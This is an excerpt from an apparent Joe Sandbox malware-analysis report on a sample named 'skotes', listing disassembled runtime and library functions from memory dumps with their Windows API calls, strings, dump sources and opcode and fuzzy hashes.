GetCurrentProcess.KERNEL32(?,?,?,?,?,?,020C5F15,?), ref: 020D0C14
GetCurrentThread.KERNEL32 ref: 020D0C1C
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,020C5F15,?), ref: 020D0C24
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,020C5F15,?), ref: 020D0C3D
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 020D0C5E

Part of subcall function 020C0478: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 020C0492

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,020C5F15,?), ref: 020D0C70
GetLastError.KERNEL32(?,?,?,?,?,020C5F15,?), ref: 020D0C9B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 020D0CB1

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
Instruction ID: e38b524320d9484e47a3da630b93441db023a2658e6bfd47aa8d3798a891bff9
Opcode Fuzzy Hash: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
Instruction Fuzzy Hash: E71121B9A01304ABD710AB74AD49FDE3BA9AF05702F180439F94ADA152EB74C404AF76

Function 00430985 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0043099B
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425CAE,?), ref: 004309AD
GetCurrentThread.KERNEL32 ref: 004309B5
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425CAE,?), ref: 004309BD
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425CAE,?), ref: 004309D6
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 004309F7

Part of subcall function 00420211: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0042022B

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425CAE,?), ref: 00430A09
GetLastError.KERNEL32(?,?,?,?,?,00425CAE,?), ref: 00430A34
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00430A4A

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
Instruction ID: 58a410a88ddb3f2405c1133c244b860286e3bd8ce2c4f5659541a2373579a810
Opcode Fuzzy Hash: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
Instruction Fuzzy Hash: 07112779600301ABD700AFB1BD5AF9B3BA89F19701F14017AF945D6253EA78D800873A

Function 020E277E Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 020E2800
_free.LIBCMT ref: 020E2824
_free.LIBCMT ref: 020E29B1
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 020E29C3
_free.LIBCMT ref: 020E2B7D

Strings

XgE, xrefs: 020E2AE0
XgE, xrefs: 020E296C, 020E2972

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE$XgE
API String ID: 597776487-1765908331
Opcode ID: 1b696d6c4c17f14bd2cd532e520e2bf73148f9a8717794c16fbf28e545bba7b4
Instruction ID: affcd85ec97a09772fda2bdabf47b052208cdde7b390e3b63d6206b04cc4058b
Opcode Fuzzy Hash: 1b696d6c4c17f14bd2cd532e520e2bf73148f9a8717794c16fbf28e545bba7b4
Instruction Fuzzy Hash: BBC10671A00305AFDF25AF788D50BEE7BEEAF45314F1801AADC9297290E7308981EB50

Function 020A5E77 Relevance: 12.4, APIs: 8, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c1a298e8fecfe48cef90fb9b18945fd86a062cf10d1e3a8c03b853429e7ba7
Instruction ID: 6ed31c056cff340cd9d3535d96adb1a4770f7bfef98bc80672c92e10a35f590b
Opcode Fuzzy Hash: d2c1a298e8fecfe48cef90fb9b18945fd86a062cf10d1e3a8c03b853429e7ba7
Instruction Fuzzy Hash: 5FF1D17090025CABEB24DF54CC84BDEBBBAFF44704F9042A9E509A72C1DB759A84CF95

Function 0040B9F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 130comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040BA57
CoCreateInstance.COMBASE(00458F80,00000000,00000001,00458F90,?), ref: 0040BA73
CoUninitialize.COMBASE ref: 0040BA81
CoUninitialize.COMBASE ref: 0040BB40
CoUninitialize.COMBASE ref: 0040BB54

Strings

stoi argument out of range, xrefs: 0040E4EA
invalid stoi argument, xrefs: 0040E4F4

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID: invalid stoi argument$stoi argument out of range
API String ID: 1968832861-1606216832
Opcode ID: 42e81b5dadb9432d45009ead610f663de47e4f9e839306fa723411e06c979015
Instruction ID: aa5973b7119725b2c9a958bba5187bd3a29cec50dc0543cd5e4a1e68f5f3e6b5
Opcode Fuzzy Hash: 42e81b5dadb9432d45009ead610f663de47e4f9e839306fa723411e06c979015
Instruction Fuzzy Hash: 82416171B00204AFDB04CF68CC89BAE77B5EB48715F10812AF805E76D5DB78A944CB99

Function 00434840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00434877
___except_validate_context_record.LIBVCRUNTIME ref: 0043487F
_ValidateLocalCookies.LIBCMT ref: 00434908
__IsNonwritableInCurrentImage.LIBCMT ref: 00434933
_ValidateLocalCookies.LIBCMT ref: 00434988

Strings

csm, xrefs: 0043491D
S9C, xrefs: 00434925, 0043492E, 0043493F

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: S9C$csm
API String ID: 1170836740-582408667
Opcode ID: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
Instruction ID: 6575625a84691e9b1f9b7e8611f910fc559112cced3487189da3a48804891882
Opcode Fuzzy Hash: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
Instruction Fuzzy Hash: 7141E874A00208ABCF10DF69C844ADF7BB4BF89318F14815BE8149B392D779EA11CF99

Function 020DECF5 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 020DED1F
_free.LIBCMT ref: 020DEDF8
_free.LIBCMT ref: 020DEE25

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: b36ae6f94d372ff64b4da89c0af13a455d4f54d85b457d19ac11513aadbc6f32
Instruction ID: b832bf8552c94876bd7bc7d4d166ddfd8e19ec12c411c326634b3032cb6e2720
Opcode Fuzzy Hash: b36ae6f94d372ff64b4da89c0af13a455d4f54d85b457d19ac11513aadbc6f32
Instruction Fuzzy Hash: 7C5105B1906345EFDB32AFB8D880AAD7BE5AF05314F04416EE9149F2C1EB718540EF55

Function 0043EA8E Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0043EAB8
_free.LIBCMT ref: 0043EB91
_free.LIBCMT ref: 0043EBBE

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 7e13cb0b5705e9cade751d436b5392716494f0a3c8e39469c6473571ee0f5945
Instruction ID: f99befb810c5c4866eaf564f7dd7d7d58b29b2c8e151ae40169767ee9d3e76c4
Opcode Fuzzy Hash: 7e13cb0b5705e9cade751d436b5392716494f0a3c8e39469c6473571ee0f5945
Instruction Fuzzy Hash: CC513670D05306AFDB24AFBB9841A6E7BA4DF0D314F00616FE510972C1EA7D9940CB4D

Function 00442517 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00442599
_free.LIBCMT ref: 004425BD
_free.LIBCMT ref: 0044274A
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 0044275C
_free.LIBCMT ref: 00442916

Strings

XgE, xrefs: 00442705, 0044270B

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE
API String ID: 597776487-2984570469
Opcode ID: 2b6728d1d25a7a4dc5655f9f1937d483343b97d9f8a5c2cfc13cb8f05322008e
Instruction ID: df7d7efe0813b1fc9665f027b9df2e4c66d539f3229410abaef311319f10ac1b
Opcode Fuzzy Hash: 2b6728d1d25a7a4dc5655f9f1937d483343b97d9f8a5c2cfc13cb8f05322008e
Instruction Fuzzy Hash: 4AC14B71900205ABFB10AF69CE517AFBBA9EF45354F9500AFF88097391E7B88E41C758

Function 0040DBE0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 185COMMON

Download Yara Rule

Strings

list too long, xrefs: 0040E09D

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: mtx_do_lock
String ID: list too long
API String ID: 1389037287-1124181908
Opcode ID: 49bd66367a3987fd4d0804e4ba397cb7ac0a9a4efa5fe6f8e5f577634f06c109
Instruction ID: 1e29e99ac9c9a3b5c0ba9015333ef2344c8a6a63817eda69dd40f949fabc9989
Opcode Fuzzy Hash: 49bd66367a3987fd4d0804e4ba397cb7ac0a9a4efa5fe6f8e5f577634f06c109
Instruction Fuzzy Hash: 8661A5B0D04718ABDB20DF65CD89B99B7B4FF04704F1041AAE80DA7281EB78A995CF59

Function 00431B29 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431B42

Part of subcall function 00431E11: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,0043188A), ref: 00431E21

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C2A

Strings

switchState, xrefs: 00431B5E
pContext, xrefs: 00431C22

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
Instruction ID: b863e61c3d732dd5109429b6f29941dee9b5abb7f1e972ae7809c7e47913e2a3
Opcode Fuzzy Hash: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
Instruction Fuzzy Hash: 8331D835A00204ABCF05EF64C881AAEB775FF4C314F20556BED1197362EB79EE05CA98

Function 020CEA16 Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 020CEA3E

Part of subcall function 020CE7AB: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 020CE7DE
Part of subcall function 020CE7AB: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 020CE800

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 020CEABB
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 020CEAC7
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 020CEAD6
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 020CEAE0
Concurrency::location::_Assign.LIBCMT ref: 020CEB14
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 020CEB1C

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: fd7e819ef725ba9c87743151f6e70800d84342faef2e6c5d5b26b3cda1d4be43
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: EC412979A00314AFCB05EFA4C494BADB7B6FF48310F2481A9DD499B381DB34A941DF91

Function 0042E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7

Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E577
Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: 01245f0547eb729828e98329900f8f6e173d559f1909e94d2917f6101dcd408e
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: 19415A39A00214EFCF00EF65D484AADB7B5FF48314F5480AAED499B382DB34A941CB95

Function 020BF0C6 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 020BF0CD
_SpinWait.LIBCONCRT ref: 020BF123
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 020BF12F
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 020BF148
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 020BF176
Concurrency::Context::Block.LIBCONCRT ref: 020BF198

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1888882079-0
Opcode ID: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
Instruction ID: 26f5b27c1b6ceba73586fb50011e7d7c299f40afefb17ef5a533824cd384c7b0
Opcode Fuzzy Hash: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
Instruction Fuzzy Hash: 7B218D7080031A9ADF77EFA4CC58AEEB7F1AF04314F504D1AE065A7590EBB18645EF91

Function 020DF342 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 020DF30A: _free.LIBCMT ref: 020DF32F

_free.LIBCMT ref: 020DF390

Part of subcall function 020DB05C: HeapFree.KERNEL32(00000000,00000000,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?), ref: 020DB072
Part of subcall function 020DB05C: GetLastError.KERNEL32(?,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?,?), ref: 020DB084

_free.LIBCMT ref: 020DF39B
_free.LIBCMT ref: 020DF3A6
_free.LIBCMT ref: 020DF3FA
_free.LIBCMT ref: 020DF405
_free.LIBCMT ref: 020DF410
_free.LIBCMT ref: 020DF41B

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: e6f7cf8a1ea375973646ceba6aa738c496b5b3bb2b9b8903d53ef204083075cd
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: 49112472542744E7DA30BB70DC89FCB7BDE7F04700F418816F69AAA891DE79B504AE90

Function 0043F0DB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043F0A3: _free.LIBCMT ref: 0043F0C8

_free.LIBCMT ref: 0043F129

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 0043F134
_free.LIBCMT ref: 0043F13F
_free.LIBCMT ref: 0043F193
_free.LIBCMT ref: 0043F19E
_free.LIBCMT ref: 0043F1A9
_free.LIBCMT ref: 0043F1B4

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: c3a7340a8ef7a1c42761e22c66233c02557cf0a4384e4ec730fa78aa122713dc
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: BC118131940B04AAD930B7B2CC07FCB77EE9F08719F40183EB699A6053DA2EB5594656

Function 020BFCD8 Relevance: 10.6, APIs: 7, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,020C3E4D), ref: 020BFCE6
GetProcAddress.KERNEL32(00000000,0045177C), ref: 020BFCF4
GetProcAddress.KERNEL32(00000000,00451794), ref: 020BFD02
GetProcAddress.KERNEL32(00000000,004517AC), ref: 020BFD30
GetLastError.KERNEL32(?,?,?,020C3E4D), ref: 020BFD4B
GetLastError.KERNEL32(?,?,?,020C3E4D), ref: 020BFD57
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 020BFD6D

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID:
API String ID: 1654681794-0
Opcode ID: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
Instruction ID: eb10446a5491df93ee2d04fd86eb4ca2db37cdc6095938403f16901a80d49396
Opcode Fuzzy Hash: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
Instruction Fuzzy Hash: 6101CC79500301AB97527BB56C8DFEB37EDAD04B52F20063BF401D2192EB78D4049B69

Function 020B7067 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 020B7138
std::_Rethrow_future_exception.LIBCPMT ref: 020B7189
std::_Rethrow_future_exception.LIBCPMT ref: 020B7199
__Mtx_unlock.LIBCPMT ref: 020B723C
__Mtx_unlock.LIBCPMT ref: 020B7342
__Mtx_unlock.LIBCPMT ref: 020B737D

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
Instruction ID: cd5a4de2bbe1e410c4bdb548e22085fe5acee4a7f40cf71a26d896497bc7afd5
Opcode Fuzzy Hash: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
Instruction Fuzzy Hash: 11C1BE72D003449FDB33DFA4C944BEEBBF5AF85304F00452AD816A76A1E775A904EB61

Function 020DFF27 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,020A8A07,00000000), ref: 020DFF6F
__fassign.LIBCMT ref: 020E014E
__fassign.LIBCMT ref: 020E016B
WriteFile.KERNEL32(?,020A8A07,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020E01B3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 020E01F3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 020E029F

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: aeaffaf03d6c38a690940c40d1bea6644629eb38ec1b3c0d319535d1d52f1a6c
Instruction ID: 31a9d21a1a60314923a93c6cc8e21f2b966776fb09bc9f120ce08cd5d6cab194
Opcode Fuzzy Hash: aeaffaf03d6c38a690940c40d1bea6644629eb38ec1b3c0d319535d1d52f1a6c
Instruction Fuzzy Hash: 86D1AC71D003489FCF15CFA8D880AEDBBF6AF49304F28416AE856BB241D770A986DB50

Function 020CEB44 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 020CEB85
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 020CEB8D
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 020CEBB7
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 020CEBC0
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 020CEC43
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 020CEC4B

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: c402cbf3b099750ba05cbc1cab84b4e0f66197371c0e0ad466187cb880663190
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
